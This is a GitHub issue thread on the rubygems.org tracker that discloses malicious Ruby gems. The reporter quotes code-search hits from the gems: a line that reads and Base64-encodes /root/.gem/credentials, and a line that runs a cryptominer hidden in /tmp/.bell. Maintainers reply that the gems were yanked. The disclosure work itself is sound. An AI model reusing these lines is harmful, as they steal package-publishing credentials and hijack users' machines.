Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

malware and miner in some gems #2097

Closed
znz opened this issue Aug 19, 2019 · 3 comments

Comments

@znz
Copy link
Contributor

commented Aug 19, 2019

I read rest-client/rest-client#713 and search similar problems using gem-codesearch.
And I found some gems contain malware and mining software.

znz@aluminium:~$ csearch 'File.read.*/root/.gem/credentials'
/home/gem-codesearch/gem-codesearch/latest-gem/awesome-bot-1.18.0/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
znz@aluminium:~$ csearch 'cpuminer'
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
@mame

This comment has been minimized.

Copy link
Contributor

commented Aug 19, 2019

Don't miss coming-soon and cron_parser too.

znz@aluminium:~$ ls -d /home/gem-codesearch/gem-codesearch/latest-gem/*/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/awesome-bot-1.18.0/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/coin_base-4.2.2/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/cron_parser-1.0.13/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike
@sonalkr132

This comment has been minimized.

Copy link
Member

commented Aug 19, 2019

Thank you for the report. We have yanked all the above-mentioned versions and locked two owners.
See https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019

@jjarmoc

This comment has been minimized.

Copy link

commented Aug 29, 2019

FYI -

I just submitted a PR to the ruby-advisory-db. When this lands, bundler-audit will detect usage of the affected gems in your Gemfile.lock.

I thought this might be helpful for those working to assess the impact to their projects. As always, I highly recommend using bundler-audit as a step in your build and deploy process.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
4 participants
You can’t perform that action at this time.